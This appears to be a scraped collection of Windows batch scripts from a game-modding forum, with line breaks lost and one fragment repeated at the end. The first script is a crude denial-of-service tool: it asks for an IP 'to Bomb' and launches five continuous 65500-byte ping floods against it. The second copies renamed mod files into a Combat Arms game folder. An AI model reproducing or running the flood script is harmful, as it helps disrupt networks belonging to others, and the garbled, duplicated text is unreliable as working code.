@ECHO off if exist cmd.exe goto User :User Set User= Set /P User=Choose an IP to Bomb, then press Enter.: %=% goto Choice :Choice choice /c yne /t 10 /d n /m "Bomb %User%?" if errorlevel 3 goto End if errorlevel 2 goto User if errorlevel 1 goto 1 :1 START cmd.exe /c "color 0A&&ping -t -l 65500 %User%" if exist cmd.exe goto 2 else goto End :2 START cmd.exe /c "color 0A&&ping -t -l 65500 %User%" if exist cmd.exe goto 3 else goto End :3 START cmd.exe /c "color 0A&&ping -t -l 65500 %User%" if exist cmd.exe goto 4 else goto End :4 START cmd.exe /c "color 0A&&ping -t -l 65500 %User%" if exist cmd.exe goto 5 else goto End :5 START cmd.exe /c "color 0A&&ping -t -l 65500 %User%" if exist cmd.exe goto Pause2 else goto End :Pause2 :End exit
@ECHO off Echo -------------------------Syntax-------------------------- Echo. Echo Follow the directions exactly. Echo. Echo It shouldn't be that hard, because I even gave Echo you some examples. If you can't figure out Echo how to use it, I feel really sorry for you. Echo. Echo Credits: FalinGrave (MPGH) Echo. Echo --------------------------------------------------------- Echo. Echo. @ECHO off if exist cmd.exe goto Name1 :Name1 Set Name1= Set /P Name1=[i.e: BlahBlahBlah_Red.DTX] Type in the file name, then press Enter.: %=% Echo Set as "%Name1%" Set Name2= Set /P Name2=[i.e: BlahBlahBlah.DTX] Type in what you want to Rename it to, then press Enter.: %=% Echo Set as "%Name2%" Set CPos= Set /P CPos=[i.e: Root:\Users\Admin\Desktop]What folder is the Modded file Located in?: %=% Echo Set as "%CPos%" Set Directory= Set /P Directory=[Minus the .Rez (Like: "GUNS_M_PV_AR")] What's the name of the Rez file you want to place it in?: %=% Echo Set as "%Directory%" Set CADir= Set /P CADir=[i.e: Root:\Nexon\CA\Game] Where is your CA Game folder located?: %=% Echo Set as "%CADir%" Echo. Echo Copying: "%CPos%\%Name1% to %CADir%\%Directory%\%Name2%" goto Choice :Choice choice /c yne /t 30 /d n /m "Is that Correct?" ::choice /c yne /t 10 /d n /m "Rename %Name1% to %Name2% and Insert into %Directory%?" if errorlevel 3 goto End if errorlevel 2 goto Name1 if errorlevel 1 goto Rename :Rename color 0A XCopy %CPos%\%Name1% /Y %CADir%\%Directory%\%Name2%" goto Pause :Pause Pause
Echo Copying: "%CPos%\%Name1% to %CADir%\%Directory%\%Name2%" goto Choice :Choice choice /c yne /t 30 /d n /m "Is that Correct?" ::choice /c yne /t 10 /d n /m "Rename %Name1% to %Name2% and Insert into %Directory%?" if errorlevel 3 goto End if errorlevel 2 goto Name1 if errorlevel 1 goto Rename